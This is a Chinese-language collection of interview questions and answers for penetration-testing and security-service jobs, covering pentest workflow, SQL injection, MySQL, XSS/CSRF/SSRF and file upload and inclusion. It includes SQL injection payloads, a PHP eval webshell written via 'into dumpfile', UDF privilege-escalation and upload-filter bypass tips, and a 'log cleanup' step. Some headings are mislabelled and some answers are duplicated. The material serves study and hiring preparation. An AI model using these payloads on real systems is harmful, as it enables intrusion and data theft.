爆肝3个月整理的一套网络安全/渗透测试/安全服务工程师面试题

前言

这次花了三个月的时间一边学习一边整理网络安全服务职位（包括但不仅限于：安全服务工程师，安全运营工程师，安全运维工程师，安全攻防工程师“）的面试问题。

话不多说，让我们一起学习吧

目前来说还有非常多的不严谨和冗余，恳请小伙伴们指正修改！

 
一、SQL注入防护方法：

• 失效的身份认证和会话管理
• 跨站脚本攻击XSS
• 直接引用不安全的对象
• 安全配置错误
• 敏感信息泄露
• 缺少功能级的访问控制
• 跨站请求伪造CSRF
• 使用含有已知漏洞的组件
• 未验证的重定向和转发

二、常见的Web安全漏洞

• SQL注入
• XSS
• 文件遍历、文件上传、文件下载
• 垂直越权、水平越权
• 逻辑漏洞

首先对于新人来说，大多数同学都是没有实战经验的，对应面试官提问聊聊你的渗透测试实战，但很多人却无从开口。
 

渗透测试流程相关

一、给你一个网站你是如何来渗透测试的? 

在获取书面授权的前提下。
1)信息收集

• 获取域名的whois信息,获取注册者邮箱姓名电话等。
• 查询服务器旁站以及子域名站点，因为主站一般比较难，所以先看看旁站有没有通用性的cms或者其他漏洞。
• 查看服务器操作系统版本，web中间件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞
• 查看IP，进行IP地址端口扫描，对响应的端口进行漏洞探测，比如 rsync,心脏出血，mysql,ftp,ssh弱口令等
• 扫描网站目录结构，看看是否可以遍历目录，或者敏感文件泄漏，比如php探针
• google hack 进一步探测网站的信息，后台，敏感文件

2）漏洞扫描

• 开始检测漏洞，如XSS,XSRF,sql注入，代码执行，命令执行，越权访问，目录读取，任意文件读取，下载，文件包含，
• 远程命令执行，弱口令，上传，编辑器漏洞，暴力破解等

3）漏洞利用

• 利用以上的方式拿到webshell，或者其他权限

4）权限提升

• 提权服务器，比如windows下mysql的udf提权，serv-u提权，windows低版本的漏洞，如iis6,pr,巴西烤肉，
• linux藏牛漏洞，linux内核版本漏洞提权，linux下的mysql system提权以及oracle低权限提权

5) 日志清理
6）总结报告及修复方案

二、渗透测试流程

• 项目访谈
• 信息收集：whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息
• 漏洞扫描：Nessus, AWVS
• 手动挖掘：逻辑漏洞
• 验证漏洞
• 修复建议
• （如果有）基线检查/复验漏洞
• 输出报告

1. 概述
2. 测试基本信息
3. 测试范围
4. 测试时间
5. 测试任务
6. 测试过程
7. 信息安全风险综合分析
8. 整体风险分析
9. 风险影响分析
10. 系统安全分析
11. 安全漏洞列表
12. 解决方案建议
13. 复测报告

SQL面试题

一、SQL注入类型

• 基于报错注入
• 基于布尔的注入，根据返回页面判断条件真假的注入
• 基于时间的盲注，不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。
• 宽字节注入
• 联合查询，可以使用 union 的情况下的注入。
• 堆查询注入，可以同时执行多条语句的执行时的注入。

二、SQL注入的原理

通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。通常未经检查或者未经充分检查的用户输入数据或代码编写问题，意外变成了代码被执行。

三、如何进行SQL注入的防御

• 关闭应用的错误提示
• 加waf
• 对输入进行过滤
• 限制输入长度
• 限制好数据库权限，drop/create/truncate等权限谨慎grant
• 预编译好sql语句，python和Php中一般使用?作为占位符。这种方法是从编程框架方面解决利用占位符参数的sql注入，只能说一定程度上防止注入。还有缓存溢出、终止字符等。
• 数据库信息加密安全（引导到密码学方面）。不采用md5因为有彩虹表，一般是一次md5后加盐再md5
• 清晰的编程规范，结对/自动化代码 review ，加大量现成的解决方案（PreparedStatement，ActiveRecord，歧义字符过滤， 只可访问存储过程 balabala）已经让 SQL 注入的风险变得非常低了。
• 具体的语言如何进行防注入，采用什么安全框架

四、sqlmap，怎么对一个注入点注入？

• 如果是get型号，直接，sqlmap -u “诸如点网址”.
• 如果是post型诸如点，可以sqlmap -u "注入点网址” --data=“post的参数”
• 如果是cookie，X-Forwarded-For等，可以访问的时候，用burpsuite抓包，注入处用*号替换，放到文件里，然后sqlmap -r “文件地址”

五、mysql的网站注入，5.0以上和5.0以下有什么区别？

10年前就出了5.0，现在都到5.7了，没啥意义的问题

• 5.0以下没有information_schema这个系统表，无法列表名等，只能暴力跑表名。
• 5.0以下是多用户单操作，5.0以上是多用户多操做。

六、MySQL存储引擎？

1、InnoDB：主流的存储引擎。支持事务、支持行锁、支持非锁定读、支持外键约束

• 为MySQL提供了具有提交、回滚和崩溃恢复能力的事物安全（ACID兼容）存储引擎。InnoDB锁定在行级并且也在 SELECT语句中提供一个类似Oracle的非锁定读。这些功能增加了多用户部署和性能。在SQL查询中，可以自由地将InnoDB类型的表和其他MySQL的表类型混合起来，甚至在同一个查询中也可以混合
• InnoDB存储引擎为在主内存中缓存数据和索引而维持它自己的缓冲池。InnoDB将它的表和索引在一个逻辑表空间中，表空间可以包含数个文件（或原始磁盘文件）。这与MyISAM表不同，比如在MyISAM表中每个表被存放在分离的文件中。InnoDB表可以是任何尺寸，即使在文 件尺寸被限制为2GB的操作系统上
• InnoDB支持外键完整性约束，存储表中的数据时，每张表的存储都按主键顺序存放，如果没有显示在表定义时指定主键，InnoDB会为每一行生成一个6字节的ROWID，并以此作为主键

2、MyISAM：访问速度快，不支持事务，逐渐被淘汰
3、MEMORY：BTREE索引或者HASH索引。将表中数据放在内存中，并发性能差。
4、MERGE、Archive等等不常用的

七、什么是事务？

事务是一组原子性的SQL语句或者说是一个独立的工作单元，如果数据库引擎能够成功对数据库应用这组SQL语句，那么就执行，如果其中有任何一条语句因为崩溃或其它原因无法执行，那么所有的语句都不会执行。也就是说，事务内的语句，要么全部执行成功，要么全部执行失败。
举个银行应用的典型例子：

假设银行的数据库有两张表：支票表和储蓄表，现在某个客户A要从其支票账户转移2000元到其储蓄账户，那么至少需求三个步骤：

a.检查A的支票账户余额高于2000元；

b.从A的支票账户余额中减去2000元；

c.在A的储蓄账户余额中增加2000元。

这三个步骤必须要打包在一个事务中，任何一个步骤失败，则必须要回滚所有的步骤，否则A作为银行的客户就可能要莫名损失2000元，就出问题了。这就是一个典型的事务，这个事务是不可分割的最小工作单元，整个事务中的所有操作要么全部提交成功，要么全部失败回滚，不可能只执行其中一部分，这也是事务的原子性特征。

八、读锁和写锁

读锁是共享的，即相互不阻塞的，多个客户在同一时刻可以读取同一资源，互不干扰。写锁是排他的，即一个写锁会阻塞其它的写锁和读锁，只有这样，才能确保给定时间内，只有一个用户能执行写入，防止其它用户读取正在写入的同一资源。写锁优先级高于读锁。

九、MySQL的索引

索引是帮助MySQL高效获取数据的数据结构。MYISAM和InnoDB存储引擎只支持BTree索引；MEMORY和HEAP储存引擎可以支持HASH和BTREE索引。

十、ORDER BY在注入的运用

order by后面可以加字段名，表达式和字段的位置，字段的位置需要是整数型。

十一、GPC是什么？GPC之后怎么绕过？

如果magic_quotes_gpc=On，PHP解析器就会自动为post、get、cookie过来的数据增加转义字符“\”，以确保这些数据不会引起程序，特别是数据库语句因为特殊字符（认为是php的字符）引起的污染。

十二、Mysql一个@和两个@什么区别

@为用户变量，使用SET @var1=1赋值
@@ 为系统变量 ，包括全局变量show global variables \G;和会话变量show session variables \G;

十三、注入/绕过常用的函数

1、基于布尔SQL盲注

left(database(),1)>'s'
ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
regexp正则注入 select user() regexp '^[a-z]';
select user() like 'ro%'

2、基于报错的SQL盲注
1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2）通过floor报错 向下取整
3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4）.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5）.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6）.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7）.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8）.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9）.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10）.exp()select * from test where id=1 and exp(~(select * from(select user())a));

3、延时注入如何来判断？

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

十四、盲注和延时注入的共同点？

都是一个字符一个字符的判断

十五、如何拿一个网站的webshell？

上传，后台编辑模板，sql注入写文件，命令执行，代码执行，
一些已经爆出的cms漏洞，比如dedecms后台可以直接建立脚本文件，wordpress上传插件包含脚本文件zip压缩包等

十六、sql注入写文件都有哪些函数？

select ‘一句话’ into outfile ‘路径’
select ‘一句话’ into dumpfile ‘路径’
select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

十七、各种写shell的问题

1、写shell用什么函数？

• select '<?php phpinfo()> into outfile 'D:/shelltest.php'
• dumpfile
• file_put_contents

2、outfile不能用了怎么办？

• select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';可以UDF提权 https://www.cnblogs.com/milantgh/p/5444398.html

3、dumpfile和outfile有什么不一样？outfile适合导库，在行末尾会写入新行并转义，因此不能写入二进制可执行文件。

4、sleep()能不能写shell？

5、写shell的条件？

• 用户权限
• 目录读写权限
• 防止命令执行：disable_functions，禁止了disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source，但是可以用dl扩展执行命令或者ImageMagick漏洞 https://www.waitalone.cn/imagemagic-bypass-disable_function.html
• open_basedir: 将用户可操作的文件限制在某目录下

十八、sql注入写文件都有哪些函数？

• select ‘一句话’ into outfile ‘路径’
• select ‘一句话’ into dumpfile ‘路径’
• select ‘<?php eval($_POST[1]) ?>’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

十九、sql二次注入

第一次进行数据库插入数据的时候，仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义，在写入数据库的时候还是保留了原来的数据，但是数据本身还是脏数据。
在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次进行需要进行查询的时候，直接从数据库中取出了脏数据，没有进行进一步的检验和处理，这样就会造成SQL的二次注入。

交友网站，填写年龄处是一个注入点，页面会显示出与你相同年龄的用户有几个。使用and 1=1确定注入点，用order by探测列数，union select探测输出点是第几列，

暴库 group_concat(schema_name) from information_schema.schemata
暴表 group_concat(table_name) from information_schema.schemata where table_schema='hhh'
获取数据 concat(flag) from flag
修复：在从数据库或文件中取数据的时候，也要进行转义或者过滤。

二十、SQL和NoSQL的区别

SQL关系型数据库，NoSQL(Not only SQL)非关系型数据库

SQL优点

关系型数据库是指用关系数学模型来表示的数据，其中是以二维表的形式描述数据。

结构稳定，不易修改，常用联表查询
查询能力高，可以操作很复杂的查询
一致性高，处理数据会使用封锁保证数据不被改变
表具有逻辑性，易于理解

SQL缺点

不适用高并发读写
不适用海量数据高效读写
层次多，扩展性低
维护一致性开销大
涉及联表查询，复杂，慢

NoSQL优点

采用键值对存储数据

由于数据之间没有关系，所以易扩展，也易于查询
数据结构灵活，每个数据都可以有不同的结构
由于降低了一致性的要求，所以查询速度更快

比较

非关系型数据库的产生是因为随着网站的进化，并发性增加，扩展性高，一致性要求降低。这样关系型数据库最重要的一致性维护就显得有点多余，并且消耗着性能。因此有了非关系型数据库，它可以算是关系型数据库的一种弱化的结果，在海量数据存储和查询上更胜一筹。

两种数据库没有好坏之分，只是使用的环境不一样。关系型数据库可以说是更严谨的，可靠性更强的数据库，在对于数据精度要求高的环境，比如说银行系统这样自然是像mysql这样的数据库适合。非关系型数据库胜在处理大数据的速度，但是对于数据的准确度没有那么高，对于操作量大的环境比如当前大部分web2.0的网站更加适用一些。

二十一、MongoDB注入方式

利用正则：找到y开头的name db.items.find({name: {$regex: "^y"}})

XSS CSRF XXE SSRF

一、CSRF 和 XSS 和 XXE 有什么区别，以及修复方式？

XSS是跨站脚本攻击，用户提交的数据中可以构造代码来执行，从而实现窃取用户信息等攻击。修复方式：对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。

 

CSRF是跨站请求伪造攻击，XSS是实现CSRF的诸多手段中的一种，是由于没有在关键操作执行时进行是否由用户自愿发起的确认。修复方式：筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer.

XXE是XML外部实体注入攻击，XML中可以通过调用实体来请求本地或者远程内容，和远程文件保护类似，会引发相关安全问题，例如敏感文件读取。修复方式：XML解析库在调用时严格禁止对外部实体的解析。

二、如何防止CSRF?

1,验证referer
2，验证token
详细：浅谈cnode社区如何防止csrf攻击 - CNode技术社区

三、CSRF、SSRF和重放攻击有什么区别？

CSRF是跨站请求伪造攻击，由客户端发起
SSRF是服务器端请求伪造，由服务器发起
重放攻击是将截获的数据包进行重放，达到身份认证等目的

四、啥是同源策略，跨域有几种方式？

浏览器安全的基石是"同源政策"，目的是为了保证用户的信息安全，防止恶意网站窃取数据，避免cookie共享。同源含义是协议、域名、端口相同的两个网页才可以共用cookie。目前如果非同源，有三种行为收到限制：
- Cookie、LocalStorage 和 IndexDB 无法读取。
- DOM 无法获得。
- AJAX 请求不能发送

五、如何规避同源策略？

1、JSONP

向服务器请求json数据回调，一般请求URL会加上&callback=xx

foo({
  "ip": "8.8.8.8"
});

由于<script>元素请求的脚本，直接作为代码运行。这时，只要浏览器定义了foo函数，该函数就会立即调用。作为参数的JSON数据被视为JavaScript对象，而不是字符串，因此避免了使用JSON.parse的步骤。

JSONP的劫持
http://blog.knownsec.com/2015/03/jsonp_security_technic/

防御：

验证 JSON 文件调用的来源（ Referer ），但是Referer 过滤（正则）不严谨、空 Referer也不行
随机token

2、WebSocket

WebSocket是一种通信协议，使用ws://（非加密）和wss://（加密）作为协议前缀。该协议不实行同源政策，只要服务器支持，就可以通过它进行跨源通信。

3、CORS(重点)

CORS是跨源资源分享（Cross-Origin Resource Sharing）的缩写。它是W3C标准，是跨源AJAX请求的根本解决方法。相比JSONP只能发GET请求，CORS允许任何类型的请求。
CORS请求大致和ajax请求，但是在头信息中加上了Origin字段表明请求来自哪个源。如果orgin是许可范围之内的话，服务器返回的响应会多出Acess-Control-Allow-*的字段

与JSONP的比较
CORS与JSONP的使用目的相同，但是比JSONP更强大。

JSONP只支持GET请求，CORS支持所有类型的HTTP请求。JSONP的优势在于支持老式浏览器，以及可以向不支持CORS的网站请求数据。

六、DOM XSS与反射XSS有啥不同，给你10s，如何快速判断一个XSS是否是DOM XSS？

• 存储型XSS：你发送一次带XSS代码的请求，以后这个页面的返回包里都会有XSS代码；
• 反射型XSS：你发送一次带XSS代码的请求，只能在当前返回的数据包中发现XSS代码；
• DOM型XSS：你发送一次带XSS代码的请求，在返回包里压根儿就找不到XSS代码的影子；

文件上传 文件包含漏洞

一、常见的上传绕过方式

• 前端js验证：禁用js/burp改包
• 大小写
• 双重后缀名
• 过滤绕过 pphphp->php
• 防护
• 文件上传目录设置为不可执行
• 使用白名单判断文件上传类型 用随机数改写文件名和路径

二、PHP文件包含函数

• include() ：使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。
• inclue_once() ：功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。
• require()：使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。
• require_once() ：功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。

Linux木马查杀

一、常见的设备有啥

• 防火墙 utm 负载均衡设备
• IPS IDS(HIDS基于主机型入侵检测系统)
• 堡垒机
• 蜜罐
• 网闸
• waf
• 扫描器
• soc(ossim开源安全信息管理系统)